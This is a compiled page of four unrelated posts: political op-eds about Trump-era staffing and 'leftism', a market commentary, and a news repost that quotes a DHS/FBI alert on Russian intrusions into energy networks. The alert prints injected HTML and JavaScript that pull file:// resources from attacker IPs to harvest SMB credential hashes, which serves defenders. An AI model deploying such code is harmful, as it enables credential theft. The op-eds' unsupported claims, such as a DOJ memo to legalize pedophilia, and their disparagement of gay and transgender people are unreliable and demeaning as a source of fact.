Tillerson out, McMaster next?

By: James Simpson | American Thinker

In a series of surprise developments this week, President Trump relieved secretary of state Rex Tillerson and replaced departing economic adviser Gary Cohn with financial news commentator Larry Kudlow.  Tillerson, Cohn, and Kudlow all oppose Trump’s recently announced steel tariffs, but Kudlow says he agrees they can be an effective bargaining chip.  Tillerson will be replaced by current CIA director Mike Pompeo.

Another Trump administration official who opposes Trump on the tariffs is national security adviser H.R. McMaster.  Recent speculation puts him next on the chopping block.  NBC News cited anonymous administration sources recently claiming that White House chief of staff John Kelly and defense secretary James Mattis are pushing for his removal, and that he may be gone in a month.  According to Bloomberg News, Kelly has been seeking a new job for McMaster at the Pentagon.  CNN claims that McMaster has looked into a position at Stanford University’s Hoover Institution.  White House press secretary Sarah Huckabee Sanders dismissed these rumors, saying McMaster is ” not going anywhere.”  There is no doubt, however, that many defense experts and Trump-supporters would like to see him gone.

A controversial figure at best, McMaster has been fingered as the person responsible for the ouster of many of Donald Trump’s most qualified and loyal NSC staff, including deputy national security advisor K.T. McFarlandRich HigginsAdam LovingerEzra Cohen-Watnick, and Sebastian Gorka.  He has defended numerous Obama administration holdovers, even renewing a security clearance for Susan Rice, one of Obama’s most notorious serial prevaricators.  He is also cited as being responsible for re-engaging the U.S. military in Afghanistan and pushing other policies candidate Trump opposed.

McMaster is a protégé of defense secretary Mattis and disgraced former CIA director Gen. David Petraeus.  He has strong support in the Senate from John McCain.  He is regaled by such left-wing, partisan outlets as New York magazine and the Washington Post.  On CNN’s Anderson Cooper, political commentator Bakari Sellers said, “[A]s a Democrat you’re honestly thankful that he’s there[.]”  He has even been defended by David Brock’s left-wing smear shop, Media Matters.  For most Trump supporters, these are not endorsements.  McMaster has also been accused of benefiting from an inflated and, in at least one aspect, wildly inaccurate résumé as a military strategist.

However, if rumors are true, McMaster’s replacement may not be any better.  Topping the list is Steve Biegun, vice president of international governmental affairs for Ford Motor Company.  Biegun is another McCain acolyte.  He led the Moscow office of the International Republican Institute, which has been chaired by McCain since 1993, and was McCain’s foreign policy adviser during the 2008 presidential campaign.  He is described as a neocon and held numerous staff positions in Congress and the Bush White House, including under former national security adviser Condoleezza Rice.  Reportedly, Rice and Mattis have been advocating Biegun to Trump.  Jack Posobiec, Navy veteran and founder of Citizens for Trump, tweeted:

Perhaps most telling is Biegun’s position as board adviser to the Center for a New American Security (CNAS), a wealthy, influential D.C. think-tank.  Its panel of experts include numerous former Obama, Bush, and Clinton advisers.  Tax filings from 2016 show income of almost $15 million.  While it claims to be “bipartisan,” in Washington, D.C., that means surrender to the omnipresent D.C. leftist establishment.  It receives donations from a long list of left-wing funders, including George Soros’s Open Society Foundations ($305,550 in 2016); the Sandler Foundation ($3.3 million, 2008-2009); Rockefeller ($300,000 for a Clout and Climate Change “war game”); the Tides Foundation ($100,000, 2009-2012); the Ploughshares Fund ($415,425); and even Tony Podesta, brother of Clinton insider John Podesta, who gave between $25,000 and $50,000 in 2017.  It has received over $2.2 million in grants from the U.S. government between 2013 and 2017 and receives donations from the governments of Japan, Britain, and the United Arab Emirates (the “transit hub” for Islamic terrorists).

CNAS was heavily involved in promoting President Obama’s Iran deal.  The Ploughshares Fund, a leader in the effort,  donated $320,000 to CNAS between 2014 and 2017 specifically “in support of the negotiated settlement with Iran on its nuclear program.”  BoeingAirbus, and General Electric, which stand to lose multi-million-dollar contracts with Iran if the nuclear deal fails, donated up to $1 million to CNAS in 2017 alone.  Current editorials by CNAS Middle East expert Ilan Goldenberg are critical of President Trump’s posture toward Iran.

Biegun can be expected to push the CNAS Iran agenda if chosen to replace McMaster.  There is little hope that Biegun, as another McCain ally and a firmly established creature of the D.C. swamp, will be any better than McMaster.  He will definitely please the Washington establishment and will be championed by national security “experts” here and abroad, because for most of their patrons, anticipated trade with Iran trumps all other considerations.  Furthermore, for the left, deeply entrenched within the foreign policy establishment throughout the West, it also means elevating the power and status of the sworn enemies of America and Israel, because our destruction is the left’s great unspoken ambition.

A second candidate is Oracle CEO Safra Catz.  Catz served on Trump’s presidential transition team, a move that prompted Oracle senior staffer George A. Polisner to resign.  Named the 12th most powerful woman in business by Forbes in 2009, Catz was born in Israel and would be a strong supporter of the Jewish state.  The Zionist Organization of America has pushed for McMaster’s removal, accusing him of being anti-Israel and in favor of the Iran nuclear deal.  ZOA might back Catz, who last summer convinced billionaire Sheldon Adelson, a strong supporter of ZOA, that McMaster has to go.  However, experience on national security issues is conspicuously absent from Catz’s résumé.

The most suitable candidate reportedly under consideration is John Bolton, a man with unmatched foreign policy credentials and numerous major accomplishments spanning decades.  Bolton visited the White House last week under wide speculation that he will replace McMaster.  Unlike Biegun, he is a loyal Trump-supporter who would not undermine the president’s agenda, but rather be a firm backstop against the D.C. establishment’s self-serving machinations and leftist tilt.  Unlike Catz, he has spent his entire career working national security and foreign policy issues.

Let’s hope President Trump will discontinue his seeming tendency to cultivate swamp support by hiring its bad actors.  Bolton’s appointment would go a long way toward convincing the American majority that President Trump remains firmly committed to making America great again.

James Simpson is an economist, businessman, author, and investigative journalist.


CERT/FBI Declaration of Russia Hacking U.S. Infrastructure

By: Denise Simon | Founders Code

US sanctions Russia for election interference, cyberattacks

The US government takes action against Russia for misdeeds including what it’s calling the “most destructive cyberattack in history.”

CNet: The White House has announced an array of sanctions against Russia for meddling in US elections and for broader hacking efforts, including one incident it called “most destructive and costly cyberattack in history.”

The US government unveiled the sanctions Thursday morning, saying they were prompted by Russia’s online propaganda campaign during the US elections, massive hacks of Yahoo and attempted cyberattacks against electrical grids in the US.

The government singled out Russia’s role in the NotPetya attack, a piece of malware that was disguised as ransomware but actually designed to destroy data. Last month, the Trump Administration attributed the attack to Russia, saying it caused billions of dollars in damage in Europe, Asia and the Americas.

“These targeted sanctions are a part of a broader effort to address the ongoing nefarious attacks emanating from Russia,” Treasury Secretary Steven Mnuchin said in a statement. The sanctions, he said, will “hold Russian government officials and oligarchs accountable for their destabilizing activities by severing their access to the US financial system.”

The sanctions come after an investigation by the Department of Homeland Security and the FBI.

The sanctions fall on 19 individuals and five Russian entities, including the Internet Research Agency, a trolling farm designed to meddle in the 2016 presidential election through divisive posts on social media. They also target Russia’s intelligence agency, known as the Federal Security Service or FSB, and the country’s military intelligence organization, the GRU.

The Russian embassy didn’t respond to a request for comment.

‘A long-overdue step’

On Capitol Hill, the sanctions fed into a continuing controversy over Russian meddling in American democratic processes.

“This is a welcome, if long-overdue, step by the Trump administration to punish Russia for interfering with the 2016 election,” Sen. Mark Warner, a Democrat from Virginia, said in a statement.

Still, the vice chairman of the Senate intelligence committee criticized the sanctions because they “do not go far enough,” pointing out that many of the named entities were either already sanctioned under the Obama administration or have been charged by the Justice Department.

“With the midterm elections fast approaching,” he said, “the Administration needs to step it up, if we have any hope of deterring Russian meddling in 2018.”

Senior national security officials said the FSB was directly involved in hacking millions of Yahoo accounts, while the GRU was behind the interference in the 2016 presidential election and the NotPetya cyberattack.

The sanctions fall under the Countering America’s Adversaries Through Sanctions Act, which authorizes pushback against “aggression by the governments of Iran, the Russian Federation and North Korea.”

Investigators found evidence of Russian attempts to hack into the US electric grid through spear-phishing tactics, senior national security officials said. The attacks have been going on since March 2016, targeting multiple US government offices, as well as energy, water, nuclear and critical manufacturing companies.

The DHS and the FBI provided details in a technical alert released Thursday, calling the actions a “multistage intrusion” through which Russian hackers were able to gain remote access into energy sector networks.

Systems Affected

  • Domain Controllers
  • File Servers
  • Email Servers


This joint Technical Alert (TA) is the result of analytic efforts between the Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI). This alert provides information on Russian government actions targeting U.S. Government entities as well as organizations in the energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors. It also contains indicators of compromise (IOCs) and technical details on the tactics, techniques, and procedures (TTPs) used by Russian government cyber actors on compromised victim networks. DHS and FBI produced this alert to educate network defenders to enhance their ability to identify and reduce exposure to malicious activity.

DHS and FBI characterize this activity as a multi-stage intrusion campaign by Russian government cyber actors who targeted small commercial facilities’ networks where they staged malware, conducted spear phishing, and gained remote access into energy sector networks. After obtaining access, the Russian government cyber actors conducted network reconnaissance, moved laterally, and collected information pertaining to Industrial Control Systems (ICS).

For a downloadable copy of IOC packages and associated files, see:

Contact DHS or law enforcement immediately to report an intrusion and to request incident response resources or technical assistance.


Since at least March 2016, Russian government cyber actors—hereafter referred to as “threat actors”—targeted government entities and multiple U.S. critical infrastructure sectors, including the energy, nuclear, commercial facilities, water, aviation, and critical manufacturing sectors.

Analysis by DHS and FBI, resulted in the identification of distinct indicators and behaviors related to this activity. Of note, the report Dragonfly: Western energy sector targeted by sophisticated attack group, released by Symantec on September 6, 2017, provides additional information about this ongoing campaign. [1] (link is external)

This campaign comprises two distinct categories of victims: staging and intended targets. The initial victims are peripheral organizations such as trusted third-party suppliers with less secure networks, referred to as “staging targets” throughout this alert. The threat actors used the staging targets’ networks as pivot points and malware repositories when targeting their final intended victims. NCCIC and FBI judge the ultimate objective of the actors is to compromise organizational networks, also referred to as the “intended target.”

Technical Details

The threat actors in this campaign employed a variety of TTPs, including:

  • spear-phishing emails (from compromised legitimate account),
  • watering-hole domains,
  • credential gathering,
  • open-source and network reconnaissance,
  • host-based exploitation, and
  • targeting industrial control system (ICS) infrastructure.

Using Cyber Kill Chain for Analysis

DHS used the Lockheed-Martin Cyber Kill Chain model to analyze, discuss, and dissect malicious cyber activity. Phases of the model include reconnaissance, weaponization, delivery, exploitation, installation, command and control, and actions on the objective. This section will provide a high-level overview of threat actors’ activities within this framework.

Stage 1: Reconnaissance

The threat actors appear to have deliberately chosen the organizations they targeted, rather than pursuing them as targets of opportunity. Staging targets held preexisting relationships with many of the intended targets. DHS analysis identified the threat actors accessing publicly available information hosted by organization-monitored networks during the reconnaissance phase. Based on forensic analysis, DHS assesses the threat actors sought information on network and organizational design and control system capabilities within organizations. These tactics are commonly used to collect the information needed for targeted spear-phishing attempts. In some cases, information posted to company websites, especially information that may appear to be innocuous, may contain operationally sensitive information. As an example, the threat actors downloaded a small photo from a publicly accessible human resources page. The image, when expanded, was a high-resolution photo that displayed control systems equipment models and status information in the background.

Analysis also revealed that the threat actors used compromised staging targets to download the source code for several intended targets’ websites. Additionally, the threat actors attempted to remotely access infrastructure such as corporate web-based email and virtual private network (VPN) connections.

Stage 2: Weaponization

Spear-Phishing Email TTPs

Throughout the spear-phishing campaign, the threat actors used email attachments to leverage legitimate Microsoft Office functions for retrieving a document from a remote server using the Server Message Block (SMB) protocol. (An example of this request is: file[:]//<remote IP address>/Normal.dotm). As a part of the standard processes executed by Microsoft Word, this request authenticates the client with the server, sending the user’s credential hash to the remote server before retrieving the requested file. (Note: transfer of credentials can occur even if the file is not retrieved.) After obtaining a credential hash, the threat actors can use password-cracking techniques to obtain the plaintext password. With valid credentials, the threat actors are able to masquerade as authorized users in environments that use single-factor authentication. [2]

Use of Watering Hole Domains

One of the threat actors’ primary uses for staging targets was to develop watering holes. Threat actors compromised the infrastructure of trusted organizations to reach intended targets. [3] Approximately half of the known watering holes are trade publications and informational websites related to process control, ICS, or critical infrastructure. Although these watering holes may host legitimate content developed by reputable organizations, the threat actors altered websites to contain and reference malicious content. The threat actors used legitimate credentials to access and directly modify the website content. The threat actors modified these websites by altering JavaScript and PHP files to request a file icon using SMB from an IP address controlled by the threat actors. This request accomplishes a similar technique observed in the spear-phishing documents for credential harvesting. In one instance, the threat actors added a line of code into the file “header.php”, a legitimate PHP file that carried out the redirected traffic.

img src=”file[:]//62.8.193[.]206/main_logo.png” style=”height: 1px; width: 1px;”

In another instance, the threat actors modified the JavaScript file, “modernizr.js”, a legitimate JavaScript library used by the website to detect various aspects of the user’s browser. The file was modified to contain the contents below:

var i = document.createElement(“img”);

i.src = “file[:]//184.154.150[.]66/ame_icon.png”;

i.width = 3;


Stage 3: Delivery

When compromising staging target networks, the threat actors used spear-phishing emails that differed from previously reported TTPs. The spear-phishing emails used a generic contract agreement theme (with the subject line “AGREEMENT & Confidential”) and contained a generic PDF document titled “document.pdf. (Note the inclusion of two single back ticks at the beginning of the attachment name.) The PDF was not malicious and did not contain any active code. The document contained a shortened URL that, when clicked, led users to a website that prompted the user for email address and password. (Note: no code within the PDF initiated a download.)

In previous reporting, DHS and FBI noted that all of these spear-phishing emails referred to control systems or process control systems. The threat actors continued using these themes specifically against intended target organizations. Email messages included references to common industrial control equipment and protocols. The emails used malicious Microsoft Word attachments that appeared to be legitimate résumés or curricula vitae (CVs) for industrial control systems personnel, and invitations and policy documents to entice the user to open the attachment.

Stage 4: Exploitation

The threat actors used distinct and unusual TTPs in the phishing campaign directed at staging targets. Emails contained successive redirects to http://bit[.]ly/2m0x8IH link, which redirected to http://tinyurl[.]com/h3sdqck link, which redirected to the ultimate destination of http://imageliners[.]com/nitel. The imageliner[.]com website contained input fields for an email address and password mimicking a login page for a website.

When exploiting the intended targets, the threat actors used malicious .docx files to capture user credentials. The documents retrieved a file through a “file://” connection over SMB using Transmission Control Protocol (TCP) ports 445 or 139. This connection is made to a command and control (C2) server—either a server owned by the threat actors or that of a victim. When a user attempted to authenticate to the domain, the C2 server was provided with the hash of the password. Local users received a graphical user interface (GUI) prompt to enter a username and password, and the C2 received this information over TCP ports 445 or 139. (Note: a file transfer is not necessary for a loss of credential information.) Symantec’s report associates this behavior to the Dragonfly threat actors in this campaign. [1] (link is external)

Stage 5: Installation

The threat actors leveraged compromised credentials to access victims’ networks where multi-factor authentication was not used. [4] To maintain persistence, the threat actors created local administrator accounts within staging targets and placed malicious files within intended targets.

Establishing Local Accounts

The threat actors used scripts to create local administrator accounts disguised as legitimate backup accounts. The initial script “symantec_help.jsp” contained a one-line reference to a malicious script designed to create the local administrator account and manipulate the firewall for remote access. The script was located in “C:\Program Files (x86)\Symantec\Symantec Endpoint Protection Manager\tomcat\webapps\ROOT\”.


Leftism and Degeneracy: A Beautiful Thing

By: Lloyd Marcus

Please forgive me for using this crude, but appropriate saying, “Don’t urinate on my head and tell me it is raining.” Leftists urinate lies, deceit, perversion, immorality and sin on our heads while telling us it’s golden nectar of beauty, love and compassion. In a nutshell, Leftists are using government to make weird and freaky declared mainstream, while trampling traditional principles and values underfoot — declared hateful, intolerant and laughable.

For example: Everyday people think a movie in which an amphibian injects its sperm into a human is gross. And yet, Hollywood deems it a beautiful love story, awarding, “The Shape of Water”, Best Picture of the Year. We commoners are too unsophisticated to appreciate the beauty of a woman copulating with a fish.

Back in 2015, Tom DeLay exposed an Obama DOJ memo spelling out 12 perversions it wanted to legalize including pedophilia and bestiality. http://nws.mx/2DUKbGS So don’t call me crazy for saying the movie, “The Shape of Water” is Leftists’ step one in warming people up to legalizing bestiality.

When 5 out of 9 SCOTUS justices basically said screw the Constitution to incorporate a redefinition of marriage into the law of the land, here is what Justice Thomas said in rebuke. “Our Constitution — like the Declaration of Independence before it — was predicated on a simple truth: One’s liberty, not to mention one’s dignity, was something to be shielded from — not provided by — the State. Today’s decision casts that truth aside.” http://washex.am/2GgkrTX

Meanwhile, Obama lit up the White House in rainbow colors and tweeted, #Love Wins! https://usat.ly/2Fy63p1 Leftists celebrated the unconstitutional ruling calling it a beautiful thing. We dare not mention the unnaturalness of using an exit as an entrance. It’s a beautiful thing.

I was rebuked for posting photos from Gay Pride parades in my column. We’re told their lifestyle is beautiful, the new normal. So why not show pictures of the beautiful things going on in Gay Pride parades; naked men performing mock sodomy in the streets; people in giant penis and vagina costumes; men and women dressed in BDSM nun outfits?

If homosexuals want to be thought of as normal, why not dress like the mainstream in their parades rather than outfits promoting extreme deviancy and blasphemy? Google “gay pride parade”.

Ponder this folks. If a guy tells his wife of 30 years he is leaving her for a woman half her age, Leftists would brand him a sexist jerk. If that same guy told his wife he is leaving her to become a woman and have sex with men, Leftists would call it a beautiful thing; embracing his true nature. Leftists would tell his devastated wife and children to support the wondrous removal of their patriarch’s penis; a beautiful thing.

At the Women’s March rally in DC, thousands proudly wore, “pussy hats”. http://fxn.ws/2IliGG3

Leftist female speakers passionately dropped numerous F bombs, inspired violence on President Trump http://bit.ly/2FJDTux and spoke of menstrual blood in gross graphic detail. http://bit.ly/2FA6U8K Leftist fake news media called the rally a beautiful thing.

Leftist’s illegal sanctuary cities like San Francisco call themselves compassionate havens for angelic illegals; a beautiful thing. The reality is rejecting federal immigration law is destroying California. In San Francisco, a map was created to help people avoid mounds of feces left by the homeless. http://bit.ly/2DeiXeP Sanctuary cites turn a blind eye to gangs of illegals terrorizing U.S. citizens; murders, rape and robberies. http://bit.ly/2krcW3k The San Francisco Bay area is experiencing a massive exodus due to crime, skyrocketing taxes, insanely high housing cost and welfare benefits for illegals. http://cbsloc.al/2ESOy38 California is the poorest state in the USA. http://bit.ly/2Dkm00m Still, Leftists tell us sanctuary cities are saintly beautiful things.

Leftists demand that we stop saying, “Merry Christmas”, teachers must stop addressing students as “boys and girls” and stop saying you’re proud to be an American — all in the name of inclusion; a beautiful thing. Most recently, Leftists forbid us saying, “God bless you”, claiming it is insensitive and intolerant. http://bit.ly/2HpFqDw

I disagreed with a well-intention minister on TV who said Christians should not respond angrily, saying we will not buy your coffee if you don’t say Merry Christmas. Leftist businesses are cramming their anti-god agenda down our throats. What is wrong with us expressing our disapproval with our dollars?

Righteous anger is an act of love. Jesus expressed anger at evil. http://bit.ly/2p7Hmtt

Decades of passivity has allowed Leftists to indoctrinate our kids and transform our culture. Who would think Leftists would boldly promote lesbianism in Disney’s new animated family movie, “Frozen 2”; calling it a beautiful thing. http://bit.ly/2Gf4vkS

It is time for Christians to be salt as God commanded — making a difference; adding godly savor to our culture. That truly is a beautiful thing.

Lloyd Marcus, The Unhyphenated American
Help Lloyd spread the Truth: http://bit.ly/2kZqmUk


Nothing Lasts To Infinity

By: Kent Engelke | Capitol Securities

Today is not different, there are just different people defined as history typically repeats itself.

Digressing considerably, the other night I was watching a documentary about Winston Churchill and the week centered on the Dunkirk disaster. He was elected in a bitter election several weeks before the “low water mark of the British Empire.” The Establishment was steeped in appeasement, an Establishment led by Lord Fairfax and Neville Chamberlin.

For those who may not recall, Neville Chamberlin was the British PM who said, “We have won peace for our time,” several months before the commencement of the greatest war that ever occurred that claimed between 85 and 100 million lives. Lord Fairfax was an extremely powerful and influential aristocratic politician that also championed appeasement, seeking peace with Germany.

In my view, the similarities, both politically and personality, between Churchill and President Trump are/were uncanny. Churchill challenged the Establishment, a challenge that almost failed miserably. Today most historians believe he is a major factor why England did not fall to the Germans.

Donald Trump is challenging the Establishment. He is reviled by both the left and the right. Comments made and attitudes about Trump are similar to those made about Churchill. Similar to Churchill, Trump is/was rallying the masses in believing that tomorrow will be better.

Many times I have commented about consumer and business sentiment surveys; surveys that have surged since November 2016 and in many regards are at the highest levels in over 30 years. Talk about Hope and Change.

Politics and economics are blood sports. The Establishment does not like change for a myriad of reasons, most specifically, all know the rules and respond politically and financially accordingly.

As I commented the other day, I do not know if there is free trade. What I do know is that the rules are changing, rules that the Establishment has spent billions in crafting

Speaking of change, the other day I referenced a JP Morgan report stating the impact of AI (algorithmic trading) had upon the markets during February’s swoon. Yesterday, Bloomberg referenced the losses in a $52 billion quantitative (algorithmic) hedge fund, the greatest since 2008, losses that are considerably greater than losses sustained in the S & P 500.

The co-founder of the fund states, “We have made easy money for a long time; that cannot go forever and I think we are in period of adjustment….it is hard to say how this unfolds given the similarities of and proliferation of these types of funds.”

Many times I have opined when everyone adopts a similar trading strategy, that days of that strategy are numbered. Are we there today?

Commenting about yesterday’s market action, equities were again lower. Some believe the decline was the result of politics. Others point to disappointing retail sales or concerns about monetary policy. While some suggest market mechanics are now completely broken where the popular cross-correlated trade is dead.

I think it is a combination of the above.

Perhaps the only certainty to write is today is considerably different than yesterday; a change that should have been expected given nothing lasts to infinity.

What will happen today?

Last night the foreign markets were up. London was up 0.07%, Paris was up 0.14% and Frankfurt was up 0.12%. China was down 0.01%, Japan was up 0.12% and Hang Sang was up 0.34%.

The Dow should open flat. The 10-year is unchanged at 2.82%.